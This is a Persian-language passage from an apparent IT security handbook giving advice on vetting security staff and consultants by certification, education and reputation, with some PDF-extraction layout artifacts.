ﺑﻴﺸﺘﺮﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﺪﻭﻳﻦﺷﺪﻩ ﺗﻮﺳـﻂ
ﺁﻥ ﺳﺎﺯﻣﺎﻥ ﻣﻄﺎﺑﻖ ﻧﻴﺎﺯﻫﺎﻱ ﻭﺍﻗﻌـﻲ ﺷـﻤﺎ ﺑﺎﺷـﺪ ﻭ ﻧـﻪ ﻣﻄـﺎﺑﻖ
ﻭﺳﺎﻳﻠﻲ ﻛﻪ ﺁﻧﻬﺎ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﺎﻧﻨﺪ.
١٠٣
•
ﻗﺎﻧﻮﻥ ﻛﺎﺭ ﻭ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺴﺎﺋﻞ ﻣﺪﻳﺮﻳﺘﻲ ﻛـﻪ ﺷـﺮﺍﻳﻄﻲ ﺭﺍ
ﭘﻴﺶ ﺑﻴﻨﻲ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬـﺎ ﺍﻓـﺮﺍﺩ ﺩﺍﺧﻠـﻲ ﺑـﺮ ﻋﻠﻴـﻪ
ﻛﺎﺭﻓﺮﻣﺎﻳﺸﺎﻥ ﺍﻗﺪﺍﻡ ﻗﺎﻧﻮﻧﻲ ﻣﻲﻛﻨﻨﺪ؛
١٧٠
ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻳﺎ ﻳﻚ ﻛﺸﻮﺭ ﺩﻳﮕﺮ ﻛﻤﻚ ﮔﺮﻓﺘﻴﺪ ،ﻓﺮﺍﻣـﻮﺵ ﻧﻜﻨﻴـﺪ
ﻛﻪ ﻳﻜﻲ ﺍﺯ ﺷﺮﺍﻳﻂ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎﻳﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛـﻪ ﺁﻧﻬـﺎ ﺑـﻪ ﺗﻮﺳـﻌﺔ
ﻇﺮﻓﻴﺖ ﻣﺤﻠﻲ ﺳﺎﺯﻣﺎﻥ ﻭ ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﻛﺸﻮﺭ ﺷـﻤﺎ ﻛﻤـﻚ
ﻛﻨﻨﺪ.
ﻼ ﻃﺒﻴﻌﻲ ﺍﺳﺖ ﻛﻪ ﻃﻲ ﺩﻭﺭﻩﻫﺎﻱ ﮔﺬﺍﺭ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ
ﺍﻳﻦ ﻛﺎﻣ ﹰ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﻛﻤﻚ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ ﺧـﺎﺭﺟﻲ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻨﺪ .ﺩﺭ ﺣﺎﻟﺖ ﺍﻳﺪﻩﺁﻝ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳـﻦ ﺭﻭﺍﺑـﻂ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ
ﺩﺍﻧﺶ ﻭ ﻓﻨـﺎﻭﺭﻱ ﻭ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺘﻌﺪﺍﺩﻫﺎﻱ ﺑـﻮﻣﻲ ﻭ ﺩﺭﺻـﻮﺭﺕ
ﺍﻣﻜﺎﻥ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﻣﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺷﺎﻳﺴﺘﮕﻲ
ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﻬﻤﺘــﺮ ﺍﺯ ﻫﻤــﻪ ﺑﺎﻳــﺪ ﺩﺭ ﻓﻜــﺮ ﺍﻓــﺮﺍﺩﻱ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﺧــﺪﻣﺎﺕ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﺮﺍ ﺑﻪ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﻣـﻲﺩﻫﻨـﺪ.
ﺑﺮ ﺧﻼﻑ ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﻣﺸﺎﻭﺭﻩﺍﻱ ،ﺩﺭ ﺧﺼﻮﺹ ﻣﺸﺎﻭﺭﻳﻨﻲ ﻛـﻪ
ﺑﺮﺍﻱ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺍﺳـﺘﺨﺪﺍﻡ ﺩﺭ ﺁﻣـﺪﻩﺍﻧـﺪ ﺑﺎﻳـﺪ ﺑـﺴﻴﺎﺭ
ﻣﺤﺘﺎﻃﺎﻧﻪ ﺭﻓﺘﺎﺭ ﻛﻨﻴﺪ؛ ﭼﺮﺍﻛﻪ ﺑﻜﺎﺭﮔﻴﺮﻱ ﻧﻴﺮﻭﻱ ﺧـﺎﺭﺟﻲ ﺑـﺮﺍﻱ
ﻻ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺳـﻄﻮﺣﻲ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ
ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻌﻤﻮ ﹰ
ﺑﻪ ﺳﻴﺴﺘﻢ ﻭ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺁﻧﻬﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﺪ.
ﻼ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻳﻢ ﺩﺭ ﺍﻃﺮﺍﻑ ﻣﺎ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﻣﺎﻫ ﹺﺮ
ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻗﺒ ﹰ
ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﻧﺪ .ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺷـﻤﺎ
ﺑﺎﻳﺪ ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻳﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺁﻧﻬﺎ ﺑـﻪ ﺍﻧـﺪﺍﺯﻩﺍﻱ ﻛـﻪ
ﻣﻲﺧﻮﺍﻫﻴﺪ ﺟﺎﻣﻊ ﻧﻴﺴﺖ ،ﻭﻟﻲ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﺯ ﻋﻬـﺪﺓ ﻛﺎﺭﺗـﺎﻥ ﺑـﺮ
ﻣﻲﺁﻳﻨﺪ .ﺩﺭ ﻣﻮﺭﺩ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺗﺨـﺼﺺ ﺧـﻮﺩ ﺍﺩﻋﺎﻫـﺎﻱ
ﺩﺭﻭﻏﻴﻦ ﻣﻲﻛﻨﻨﺪ ﻳﺎ ﺁﻧﻬﺎ ﻛﻪ ﺗﺨﺼﺼﺸﺎﻥ ﺑـﻪ ﺁﻧﭽـﻪ ﺑـﺪﺍﻥ ﻧﻴـﺎﺯ
ﺩﺍﺭﻳﺪ ﻧﺎﻣﺮﺑﻮﻁ ﺍﺳﺖ ﻣﺮﺍﻗﺐ ﺑﺎﺷﻴﺪ .ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﺯ ﺧﺪﻣﺎﺕ ﻓﺮﺩ ﻳﺎ
ﺷﺮﻛﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺧﻮﺩ ﺍﻋﺘﺮﺍﻑ ﻣﻲﻛﻨﻨﺪ "ﺩﺭ ﺧﻼﻝ ﻛـﺎﺭ،
ﻻ ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﻭﺟﻪ ﻛﻤﺘـﺮﻱ
ﻳﺎﺩﮔﻴﺮﻱ ﻫﻢ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ" )ﻭ ﺍﺣﺘﻤﺎ ﹰ
ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻨﺪ( ،ﺗﺎ ﺍﻳﻨﻜـﻪ ﻓـﺮﺩﻱ ﺍﺳـﺘﺨﺪﺍﻡ ﻛﻨﻴـﺪ ﻛـﻪ ﺗـﻼﺵ
ﻣﻲﻛﻨﺪ ﻧﻘﺎﻳﺺ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ ﻛﻨﺪ.
ﺑﺎﺯﺍﺭﻫﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘـﻪ ﺍﺯ ﺍﻓـﺮﺍﺩﻱ
ﻛﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻳﻤﻦ ﻛـﺮﺩﻥ ﺑـﺴﺘﺮﻫﺎﻱ Windowsﺩﺭ ﺳـﻄﻮﺡ
ﻣﺨﺘﻠﻒ ﺗﺨﺼﺺ ﺩﺍﺭﻧـﺪ ﺍﺷـﺒﺎﻉ ﺷـﺪﻩ ﺍﺳـﺖ ،ﺍﻣـﺎ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ
ﺑﺴﺘﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺯ ﺟﻤﻠﻪ Unixﻛﻤﺘﺮ ﻫﺴﺘﻨﺪ .ﺍﺯ ﻛﺘﺎﺑﻬﺎ ﻣﻲﺗﻮﺍﻥ
ﺍﻃﻼﻋﺎﺕ ﺯﻳﺎﺩﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺁﻣﻮﺧﺖ ،ﺍﻣﺎ ﺗﻨﻬﺎ ﻣﻄﺎﻟﻌﺔ ﻛﺘﺎﺏ
ﻛﺎﻓﻲ ﻧﻴﺴﺖ .ﺩﺭ ﺣﻮﺯﻩﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻣـﻮﺭﺩ ﺁﻧﻬـﺎ ﻧﮕﺮﺍﻧـﻲ ﺩﺍﺭﻳـﺪ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺪﻧﺒﺎﻝ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺷﺎﻳﺴﺘﮕﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﺎﺷﻴﺪ؛ ﺑﺨﺼﻮﺹ:
ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ
ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﺑﺨﻮﺍﻫﻴﺪ ﻭ ﺍﺯ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ
ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ .ﺑﺮﺧﻲ ﺍﺯ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ ﻗﺎﺑﻞ
ﺧﺮﻳﺪ ﻫﺴﺘﻨﺪ ﻭ ﻓﺮﺩ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﺁﻧﻬﺎ ﻛﺎﻓﻴﺴﺖ ﺩﺭ ﻳﻜـﺴﺮﻱ ﺍﺯ
ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻳـﺎ ﻛﻼﺳـﻬﺎﻱ ﺁﻣﻮﺯﺷـﻲ ﺷـﺮﻛﺖ ﻛﻨـﺪ،
ﻣﻄﺎﻟﺐ ﺗﺌﻮﺭﻱ ﺭﺍ ﺑﺮﺍﻱ ﭼﻨﺪ ﺳﺎﻋﺖ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ ،ﻭ ﺳﺆﺍﻻﺕ
ﺗﺴﺘﻲ ﺭﺍ ﭘﺎﺳﺦ ﺩﻫﺪ .ﺍﻳﻦ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ ﭼﻨﺪﺍﻥ ﺍﺭﺯﺷﻤﻨﺪ ﻧﻴـﺴﺘﻨﺪ.
ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ ﺗﺠﺎﺭﺏ ﻋﻤﻠﻲ ﻭ
ﺗﺨﺼﺺ ﻋﻤﻴﻘﺘﺮ ﻣﻲﺑﺎﺷﻨﺪ.
ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻫﻨﻮﺯ ﻳﻚ ﺑﺤﺚ ﺩﺭﺣﺎﻝ ﺗﻜﺎﻣﻞ ﺍﺳﺖ ﻭ ﻟـﺬﺍ ﺍﺯ ﺍﺷـﺎﺭﻩ
ﺑﻪ ﻧﻤﻮﻧﻪﻫﺎﻱ ﻓﻌﻠﻲ ﺁﻥ ﺍﻛﺮﺍﻩ ﺩﺍﺭﻳﻢ ،ﺍﻣﺎ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣـﻲﺗـﻮﺍﻥ
ﺑﻪ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ١٠٦CISSPﺍﺷـﺎﺭﻩ ﻛـﺮﺩ ﻛـﻪ ﻫﺮﭼﻨـﺪ ﻫﻤـﺔ ﺁﻥ
ﭼﻴﺰﻱ ﻧﻴﺴﺖ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﻢ ،ﺍﻣﺎ ﻳﻚ ﻣﺪﺭﻙ ﻣﻌﺘﺒـﺮ
ﺑﺮﺍﻱ ﺗﺄﻳﻴﺪ ﺳﻄﺤﻲ ﻣﻌﻴﻦ ﺍﺯ ﺗﺠﺮﺑﻪ ﻭ ﺗﺨﺼﺺ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ
١٠٧
ﺍﺳﺖ.
ﺗﺤﺼﻴﻼﺕ
ﺳﻮﺍﺑﻖ ﺗﺤﺼﻴﻠﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ .ﺑﺮﺧﻲ ﺍﻓـﺮﺍﺩ ﻣﻬـﺎﺭﺕ ﺑـﺎﻻﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻧﺘﻴﺠﺔ ﻣﻄﺎﻟﻌـﻪ ﻭ ﺗﺠﺮﺑـﺔ ﺷﺨـﺼﻲ ﺑﺪﺳـﺖ
ﺁﻭﺭﺩﻩﺍﻧﺪ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺩﺭﺑﺎﺭﺓ ﻋﻠﻮﻡ ﻭ ﻣﻬﻨﺪﺳﻲ ﺭﺍﻳﺎﻧـﻪ ﻣـﺪﺍﺭﻙ
ﺗﺤﺼﻴﻠﻲ ﻭ ﺩﺍﻧﺸﻜﺪﻩﺍﻱ ﺩﺍﺭﻧﺪ؛ ﺍﻣﺎ ﺑﺎﻭﺭ ﺟﻬﺎﻧﻲ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ
ﺳﻄﺢ ﻣﻬﺎﺭﺕ ﻣﻬﻤﺘﺮ ﺍﺯ ﻣﺪﺍﺭﻙ ﺍﺳﺖ .ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﺩﺭ ﺑﺨـﺶ
ﻛﺎﺭﻛﻨﺎﻥ ﺍﺷﺎﺭﻩ ﻛﺮﺩﻳﻢ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺍﺩﻋﺎﻫﺎﻱ ﻣﺘﻘﺎﺿـﻴﺎﻥ
ﺑﺎ ﻣﺪﺍﺭﻛﺸﺎﻥ ﻣﻄﺎﺑﻘﺖ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ .ﺳﺎﺯﻣﺎﻥ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺍﻳـﺎﻻﺕ
ﻣﺘﺤﺪﻩ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﺗﻌـﺪﺍﺩ ﻣﺤـﺪﻭﺩﻱ ﻣﺆﺳـﺴﺔ
ﺁﻣﻮﺯﺷﻲ ﺭﺍ ﺑﻌﻨﻮﺍﻥ "ﻗﻄﺒﻬﺎﻱ ﺁﻣﻮﺯﺷﻲ" ﻣﻌﺮﻓﻲ ﻛﺮﺩﻩ ﺍﺳﺖ .ﻃﺒﻖ
ﺁﻥ ﻓﻬﺮﺳﺖ ﻃﺮﺣﻬﺎﻱ ﭘﻴـﺸﺮﻭﻱ ﻣﺆﺳـﺴﺔ infosecﺩﺭ ﮊﻭﺋـﻦ
۲۰۰۲ﺩﺭ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﺟﺮﺝ ﻣﻴـﺴﻮﻥ ،١٠٨ﺟﻴﻤـﺰ ﻣﺪﻳـﺴﻮﻥ،١٠٩
ﺍﻳﺎﻟﺖ ﺍﻳﺪﺍﻫﻮ ،١١٠ﺍﻳﺎﻟـﺖ ﺁﻳـﻮﺍ ،١١١ﺁﻣﻮﺯﺷـﮕﺎﻩ ﻛﺎﺭﺷﻨﺎﺳـﻲ ﺍﺭﺷـﺪ
۱۰۶ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﭘﻮﺭﺗﺎﻝ ﻭﺏ CISSPﺩﺭ:
http://www.cissps.com/
۱۰۷ﮔﻮﺍﻫﻲﻫﺎﻱ ﺯﻳﺮ ﺩﺭ ﺁﺩﺭﺱ www.isaca.orgﺭﺍ ﻧﻴﺰ ﺑﺒﻴﻨﻴﺪ:
)CISA (Certified Information Security Auditor
CISM (Certified Information Security
)Manager
George Mason University
James Medison University
Idaho
Iowa
108
109
110
111
١٧١
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻧﻴﺮﻭﻱ ﺩﺭﻳﺎﻳﻲ ،ﺩﺍﻧﺸﮕﺎﻩ ﭘﻮﺭﺩﻭ ،١١٢ﺩﺍﻧﺸﮕﺎﻩ ﻛﺎﻟﻴﻔﺮﻧﻴـﺎ
ﺩﺭ ﺩﻳﻮﻳﺲ ،١١٣ﻭ ﺩﺍﻧﺸﮕﺎﻩ ﺍﻳﺪﺍﻫﻮ ﺍﺭﺍﺋﻪ ﺷﺪﻧﺪ .ﺩﺭ ﺍﻃﺮﺍﻑ ﺟﻬـﺎﻥ
ﻣﺮﺍﻛﺰ ﻣﻘﺪﻣﺎﺗﻲ ﻓﺮﺍﻭﺍﻧـﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭﺟـﻮﺩ
ﺩﺍﺭﻧﺪ .ﻣﻨﺎﺑﻊ ﻣﺤﻠﻲ ﺧﻮﺩ ﺍﺯ ﺟﻤﻠﻪ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗـﺎ
ﻣﺮﺍﻛﺰ ﻣﺸﺎﺑﻬﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻧﺠﺎ ﻣﺴﺘﻘﺮ ﺑﺎﺷﻨﺪ ﺭﺍ ﺑﻴﺎﺑﻴﺪ.
ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﻳﻜـﻲ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺩﺭ ﺑﺨـﺶ
ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻧﻤﺎﺋﻴﺪ.
ﺷﻬﺮﺕ
ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﺍﺯ ﻛﺎﺭ ﺑﺎ ﺍﻓﺮﺍﺩ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺩﻋﺎ ﻣـﻲﻛﻨﻨـﺪ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺻﻼﺡ ﺷﺪﻩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻣﺸﺎﻭﺭﺍﻥ ﺍﻣﻨﻴﺖ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ
ﺧﻮﺩﺩﺍﺭﻱ ﻛﻨﻴﺪ ١١٤.ﺍﮔﺮﭼﻪ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﺍﺭﺗﻜـﺎﺏ
ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭﮔﻴﺮ ﻫﺴﺘﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺗﺒﺪﻳﻞ ﺑﻪ ﻋﻀﻮ ﻣﻔﻴﺪﻱ
ﺍﺯ ﺟﺎﻣﻌﻪ ﺷﻮﻧﺪ ،ﺍﻣﺎ ﻧﺒﺎﻳﺪ ﺑﻼﻓﺎﺻﻠﻪ ﺑﻪ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﺮﺗﻜﺐ ﺟﺮﺍﺋﻢ
ﺷﺪﻩﺍﻧﺪ ﻳﺎ ﺳﻮﺀ ﺳﺎﺑﻘﻪ ﺩﺍﺭﻧﺪ ﺧﻮﺵ ﺑﻴﻦ ﺷﺪ .ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﻧﻜﺎﺕ
ﺯﻳﺮ ﻗﺎﺑﻞ ﺍﺷﺎﺭﻩﺍﻧﺪ:
.۱
ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﮔﺬﺷﺘﺔ ﺧﻮﺩ ﺳﺎﺑﻘﺔ ﺧﺪﺷﻪﺩﺍﺭ
ﻛﺮﺩﻥ ﻗﺎﻧﻮﻥ ،ﻣﺎﻟﻜﻴـﺖ ﺷﺨـﺼﻲ ،ﻭ ﺣﻘـﻮﻕ ﺧـﺼﻮﺻﻲ
ﺍﻓﺮﺍﺩ ﺭﺍ ﺩﺍﺭﻧﺪ ﺍﻧﺘﺨﺎﺏ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺩﺍﺭﺍﺋـﻲ ﻭ
ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﺣﺮﺍﺳـﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺣﻴـﺎﺗﻲ
ﺑﺎﺷﻨﺪ .ﺁﻳﺎ ﺷﻤﺎ ﺣﺎﺿﺮﻳﺪ ﺍﺯ ﻳﻚ ﻣﺠـﺮﻡ ﺳـﺎﺑﻘﻪﺩﺍﺭ ﺑـﺮﺍﻱ
ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻢ ﻧﻈﺎﺭﺕ ﻭ ﻫﺸﺪﺍﺭ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﻴﺪ؟ ﺁﻳﺎ ﺣﺎﺿﺮﻳﺪ ﻳﻚ ﺗﺒﻬﻜـﺎﺭ ﺍﺻـﻼﺡ ﺷـﺪﻩ ﺭﺍ ﺑـﺮﺍﻱ
ﺍﺩﺍﺭﺓ ﻣﺮﻛﺰ ﻣﺮﺍﻗﺒﺘﻬﺎﻱ ﻭﻳﮋﺓ ﺷﺮﻛﺖ ﺑﻜـﺎﺭ ﮔﻴﺮﻳـﺪ؟ ﺍﻳـﻦ
ﻣﻮﺍﺭﺩ ﺗﻨﻬـﺎ ﭘـﻴﺶﺑﻴﻨﻴﻬـﺎﻱ ﺑـﺪ ﻧﻴـﺴﺘﻨﺪ؛ ﺑﻠﻜـﻪ ﻫﺮﻳـﻚ
ﺩﺭﺻــﻮﺭﺕ ﺑــﺮﻭﺯ ﺍﺷــﻜﺎﻝ ﻣــﻲﺗﻮﺍﻧﻨــﺪ ﭘــﺎﻱ ﺷــﻤﺎ ﺭﺍ ﺑــﻪ
ﺩﺍﺩﮔﺎﻫﻬﺎ ﻭ ﻣﺤﺎﻛﻢ ﻣﺪﻧﻲ ﺑﺎﺯ ﻛﻨﻨﺪ -ﺑﻪ ﻫـﺮ ﺣـﺎﻝ ﺍﻳـﻦ
ﺷﻤﺎ ﺑﻮﺩﻩﺍﻳﺪ ﻛﻪ ﻋﻠﻴﺮﻏﻢ ﺁﮔﺎﻫﻲ ﺍﺯ ﺳﺎﺑﻘﺔ ﺁﻧـﺎﻥ ﺗـﺼﻤﻴﻢ
ﺑﻪ ﺍﺳﺘﺨﺪﺍﻣﺸﺎﻥ ﮔﺮﻓﺘﻪﺍﻳﺪ.
.۲
ﺑﻪ ﻫﻤﻴﻦ ﺻﻮﺭﺕ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻫﻨﮕﺎﻡ ﺍﻧﺠـﺎﻡ
ﻣﺼﺎﺣﺒﻪ ﺑﺎ ﺷﻤﺎ ﺍﺯ ﺍﺭﺍﺋﻪ ﺍﺳﻢ ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﺍﻣﺘﻨﺎﻉ ﻣﻲﻭﺭﺯﻧﺪ
ﻣﺮﺍﻗﺒﺖ ﺑﻪ ﺧﺮﺝ ﺩﻫﻴﺪ .ﺷﺎﻳﺪ ﺁﻧﻬﺎ ﻭﺍﻗﻌﹰﺎ ﺩﺭ ﻭﺭﻭﺩ ﺑﻪ ﺑﺪﻧـﺔ
ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺗﻤـﺎﺱ ﺗﻠﻔﻨـﻲ ﺧﺒـﺮﻩ
ﺑﺎﺷﻨﺪ! ﺍﻣﺎ ﻳﻜﻲ ﺍﺯ ﺍﺑﺘﺪﺍﺋﻲﺗـﺮﻳﻦ ﺩﻻﻳﻠـﻲ ﻛـﻪ ﻣـﻲﺗـﻮﺍﻥ
ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺍﻓﺮﺍﺩ ﺍﺯ ﺍﺳﺎﻣﻲ ﻣﺴﺘﻌﺎﺭ ﺑﺮﺷﻤﺮﺩ ﺍﻳﻦ ﺍﺳـﺖ
ﻛﻪ ﻧﻤﻲﺧﻮﺍﻫﻨﺪ ﺩﺭ ﻗﺒﺎﻝ ﻛﺎﺭﻫﺎﻳﺸﺎﻥ ﻣﺴﺌﻮﻟﻴﺘﻲ ﺑﺮ ﻋﻬﺪﻩ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﮔﺮ ﻳـﻚ ﻧـﺎﻡ ﻣـﺴﺘﻌﺎﺭ ﺑـﺪﻧﺎﻡ ﺷـﺪ ﺑـﺴﻴﺎﺭ
ﺁﺳﺎﻧﺘﺮ ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﻋﻮﺽ ﻛﺮﺩ ﺗﺎ ﺍﻳﻨﻜﻪ ﻛﺴﻲ ﺑﺨﻮﺍﻫـﺪ
ﻧﺎﻡ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺩ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ ﻭ ﻳـﺎ ﺳـﺎﺑﻘﺔ ﺁﻧـﺮﺍ ﺍﺻـﻼﺡ
ﻛﻨﺪ.
ﺑﻴﻤﻪ ﻭ ﺗﻌﻬﺪﻧﺎﻣﻪ
